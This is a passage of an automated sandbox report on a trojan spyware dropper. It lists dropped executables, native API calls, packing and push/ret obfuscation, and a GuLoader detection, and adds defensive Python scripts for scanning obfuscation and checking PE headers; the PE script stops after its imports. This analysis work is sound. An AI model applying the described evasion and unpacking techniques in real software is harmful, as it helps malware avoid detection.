Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05331810 17_2_05331810
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_053353F8 17_2_053353F8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05330448 17_2_05330448
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05332E48 17_2_05332E48
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533E0E2 17_2_0533E0E2
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_05337BAE 17_2_05337BAE
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014DEC68 18_2_014DEC68
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014DCBD7 18_2_014DCBD7
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E4230 18_2_058E4230
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E3EE8 18_2_058E3EE8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E4B00 18_2_058E4B00
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E0013 18_2_058E0013
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_058E0040 18_2_058E0040
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E2230 23_2_023E2230
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E224B 23_2_023E224B
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E21B8 23_2_023E21B8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E21EA 23_2_023E21EA
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E1EE0 23_2_023E1EE0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_023E1ED0 23_2_023E1ED0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_028993E0 23_2_028993E0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_028986A8 23_2_028986A8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289D430 23_2_0289D430
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289B448 23_2_0289B448
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289CED7 23_2_0289CED7
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0289D763 23_2_0289D763
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_029525F0 23_2_029525F0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02956AA0 23_2_02956AA0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0295EBB0 23_2_0295EBB0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_0295F7F0 23_2_0295F7F0
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_029909E8 23_2_029909E8
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02992230 23_2_02992230
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02992220 23_2_02992220
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02997771 23_2_02997771
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF 24_2_73781BFF
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A914 24_2_0286A914
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869E6C 24_2_02869E6C
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865E6D 24_2_02865E6D
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866677 24_2_02866677
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865E7B 24_2_02865E7B
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02869B92 24_2_02869B92
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866FCF 24_2_02866FCF
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865B72 24_2_02865B72
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028690B1 24_2_028690B1
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028618C4 24_2_028618C4
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02867CC0 24_2_02867CC0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286784E 24_2_0286784E
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_0286A06A 24_2_0286A06A
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028699DC 24_2_028699DC
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028665DC 24_2_028665DC
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028699D8 24_2_028699D8
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02866101 24_2_02866101
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02865D1C 24_2_02865D1C
PE file contains strange resources
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fw8ex1BNek.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4924.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acgvitw.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll (the same load event is reported 19 further times)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: mscorjit.dll
Uses 32bit PE files
Source: fw8ex1BNek.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401889 Sleep,NtTerminateProcess, 0_2_00401889
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0040144E NtAllocateVirtualMemory, 0_2_0040144E
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401471 NtAllocateVirtualMemory, 0_2_00401471
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401824 Sleep,NtTerminateProcess, 0_2_00401824
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004024F3 NtClose, 0_2_004024F3
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401888 Sleep,NtTerminateProcess, 0_2_00401888
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004018A2 Sleep,NtTerminateProcess, 0_2_004018A2
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004018A6 Sleep,NtTerminateProcess, 0_2_004018A6
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0040151C NtMapViewOfSection, 0_2_0040151C
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00402127 NtQuerySystemInformation, 0_2_00402127
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004021F4 NtQueryInformationProcess, 0_2_004021F4
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_004021AC NtQueryInformationProcess, 0_2_004021AC
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00401FB5 NtQuerySystemInformation, 0_2_00401FB5
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401889 Sleep,NtTerminateProcess, 11_2_00401889
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0040144E NtAllocateVirtualMemory, 11_2_0040144E
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401471 NtAllocateVirtualMemory, 11_2_00401471
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401824 Sleep,NtTerminateProcess, 11_2_00401824
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004024F3 NtClose, 11_2_004024F3
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401888 Sleep,NtTerminateProcess, 11_2_00401888
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004018A2 Sleep,NtTerminateProcess, 11_2_004018A2
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004018A6 Sleep,NtTerminateProcess, 11_2_004018A6
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0040151C NtMapViewOfSection, 11_2_0040151C
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00402127 NtQuerySystemInformation, 11_2_00402127
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004021F4 NtQueryInformationProcess, 11_2_004021F4
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_004021AC NtQueryInformationProcess, 11_2_004021AC
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_00401FB5 NtQuerySystemInformation, 11_2_00401FB5
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0541F9A0 NtAllocateVirtualMemory, 17_2_0541F9A0
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0541F8C0 NtUnmapViewOfSection, 17_2_0541F8C0
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_02867502 NtAllocateVirtualMemory, 24_2_02867502
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028675C6 NtAllocateVirtualMemory, 24_2_028675C6
Source: 4924.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fw8ex1BNek.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/9@50/10
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe File read: C:\Users\desktop.ini
Source: fw8ex1BNek.exe Virustotal: Detection: 39%
Source: fw8ex1BNek.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\fw8ex1BNek.exe "C:\Users\user\Desktop\fw8ex1BNek.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\acgvitw C:\Users\user\AppData\Roaming\acgvitw
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4924.exe C:\Users\user\AppData\Local\Temp\4924.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8CE5.exe C:\Users\user\AppData\Local\Temp\8CE5.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB56.tmp
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\4924.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\fw8ex1BNek.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Unpacked PE file: 0.2.fw8ex1BNek.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\acgvitw Unpacked PE file: 11.2.acgvitw.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Yara detected GuLoader
Source: Yara match File source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp, type: MEMORY
.NET source code contains method to dynamically call methods (often used by packers)
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0042C14A pushad ; retn 0042h 0_2_0042C14D
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081F61C push 27BD53DCh; ret 0_2_0081F63C
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00820A62 push esp; iretd 0_2_00820A6F
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081F3A3 push esi; iretd 0_2_0081F3A9
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_008205A7 push edi; ret 0_2_008205A8
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_008205B4 push ebp; retf 0_2_008205B5
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081C7BC push ecx; ret 0_2_0081C7BD
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00820351 push es; ret 0_2_00820371
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0042C14A pushad ; retn 0042h 11_2_0042C14D
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EFE41 push es; ret 11_2_007EFE61
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EC2AC push ecx; ret 11_2_007EC2AD
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F00A4 push ebp; retf 11_2_007F00A5
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F0097 push edi; ret 11_2_007F0098
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EEE93 push esi; iretd 11_2_007EEE99
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F0552 push esp; iretd 11_2_007F055F
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EF10C push 27BD53DCh; ret 11_2_007EF12C
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_00AA9C81 push 00000028h; retf 0000h 17_2_00AA9C86
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_00AA9E0B push esp; ret 17_2_00AA9E25
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F0D8C push E86E0343h; retf 17_2_052F0D91
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F1868 push ss; iretd 17_2_052F1807
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533D4EB push esp; iretd 17_2_0533D4F1
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533CF38 pushad ; retf 17_2_0533CF39
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533CF78 pushfd ; retf 17_2_0533CF79
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533E0B6 push eax; ret 17_2_0533E0B8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_00AA9C81 push 00000028h; retf 0000h 18_2_00AA9C86
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_00AA9E0B push esp; ret 18_2_00AA9E25
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014D3CD3 push esp; iretd 18_2_014D3CD1
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014D3C98 push esp; iretd 18_2_014D3CD1
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02995E93 push cs; ret 23_2_02995F04
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_737830C0 push eax; ret 24_2_737830EE
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028642E1 push edx; iretd 24_2_028642E2
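Each line above is the sandbox reporting a push immediately followed by a return: the push/ret pair behaves like an indirect jmp to the pushed value, so linear disassembly loses the real control flow. The scanner below is an added example, not the sandbox's own detector. It decodes the push and return forms that occur in the listing (push r32, push imm32/imm8, push es/cs/ss/ds, pushad, pushfd, ret, retn imm16, retf, iretd) at every byte offset of a buffer. The input buffer is constructed from a few of the pairs listed, such as push 27BD53DCh; ret and pushad; retn 0042h, prefixed by a benign function prologue; the base address is arbitrary.

```python
"""Scan x86 code bytes for push/ret control-flow obfuscation pairs.

Added example; the input buffer is constructed from the instruction pairs the
report lists and is not an extract of the analysed sample.
"""
import struct

# One-byte pushes (0x50-0x57 push r32, segment pushes, pushad/pushfd) and the return forms.
PUSH_REG = {0x50 + i: f"push {r}" for i, r in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
PUSH_MISC = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
             0x60: "pushad", 0x9C: "pushfd"}
RET = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RET_IMM16 = {0xC2: "retn", 0xCA: "retf"}  # return with a 16-bit stack adjustment


def decode_push(code: bytes, i: int):
    """Return (mnemonic, length) if a push instruction starts at code[i], else None."""
    op = code[i]
    if op in PUSH_REG:
        return PUSH_REG[op], 1
    if op in PUSH_MISC:
        return PUSH_MISC[op], 1
    if op == 0x68 and i + 5 <= len(code):            # push imm32
        imm = struct.unpack_from("<I", code, i + 1)[0]
        return f"push {imm:08X}h", 5
    if op == 0x6A and i + 2 <= len(code):            # push imm8 (sign-extended)
        return f"push {code[i + 1]:02X}h", 2
    return None


def decode_ret(code: bytes, i: int):
    """Return (mnemonic, length) if a return instruction starts at code[i], else None."""
    op = code[i]
    if op in RET:
        return RET[op], 1
    if op in RET_IMM16 and i + 3 <= len(code):
        imm = struct.unpack_from("<H", code, i + 1)[0]
        return f"{RET_IMM16[op]} {imm:04X}h", 3
    return None


def find_push_ret(code: bytes, base: int = 0) -> list:
    """Return [(address, 'push ...; ret ...')] for every push directly followed by a return.

    Every byte offset is tried, as a sweep over a suspicious region would do,
    so run this over code regions, not over data sections.
    """
    hits = []
    for i in range(len(code)):
        push = decode_push(code, i)
        if push is None or i + push[1] >= len(code):
            continue
        ret = decode_ret(code, i + push[1])
        if ret is not None:
            hits.append((base + i, f"{push[0]}; {ret[0]}"))
    return hits


# Constructed buffer: a benign function prologue followed by pairs taken from the report.
SAMPLE_CODE = (
    b"\x8B\xFF\x55\x8B\xEC"            # mov edi,edi; push ebp; mov ebp,esp (benign, no hit)
    b"\x68\xDC\x53\xBD\x27\xC3"        # push 27BD53DCh; ret
    b"\x60\xC2\x42\x00"                # pushad; retn 0042h
    b"\x57\xC3"                        # push edi; ret
    b"\x55\xCB"                        # push ebp; retf
    b"\x54\xCF"                        # push esp; iretd
    b"\x06\xC3"                        # push es; ret
)
SAMPLE_BASE = 0x00400000  # arbitrary image base for the constructed buffer


def scan_sample() -> list:
    """Run the scanner over the constructed buffer and return the hit list."""
    return find_push_ret(SAMPLE_CODE, SAMPLE_BASE)


if __name__ == "__main__":
    for addr, text in scan_sample():
        print(f"{addr:08X}  {text}")
```

Because every offset is tried, the scanner will also match two adjacent data bytes; restrict it to executable regions (or to the unpacked PE the sandbox dumped) and read the result as the report does: a handful of scattered hits in a large binary can be coincidence, a cluster of them in a small region, as in the listing above, is the packer stub.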
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 24_2_73781BFF
Binary contains a suspicious time stamp
Source: DB56.exe.5.dr Static PE information: 0xA6AE113F [Tue Aug 13 00:52:15 2058 UTC]
PE file contains an invalid checksum
Source: 4924.exe.5.dr Static PE information: real checksum: 0x646b4 should be: 0x646d1
Source: DB56.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x939dd
Source: initial sample Static PE information: section name: .text entropy: 7.03736201849
Source: initial sample Static PE information: section name: .text entropy: 7.52699661786
Source: initial sample Static PE information: section name: .text entropy: 7.03736201849
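The checksum, timestamp and entropy findings above, together with the section-rights comparison under "Detected unpacking (changes PE section rights)", are all cheap static checks that can be reproduced without the sandbox. The Python below is an added example and not the sandbox's own code: it recomputes the PE checksum with the same algorithm as CheckSumMappedFile (skipping the CheckSum field and adding the file size), decodes the COFF TimeDateStamp (0xA6AE113F resolves to 2058-08-13 00:52:15 UTC, as the report states), computes Shannon entropy per section and renders section characteristics in the report's E/R/W notation. It runs against a constructed minimal PE32 built in memory, not against the analysed files, uses only the standard library, and assumes a 4-byte aligned e_lfanew.

```python
"""Static PE triage: checksum, link timestamp, section entropy and section rights.

Added example; the PE inspected is constructed in memory, not one of the report's
samples. Standard library only; e_lfanew is assumed to be 4-byte aligned."""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

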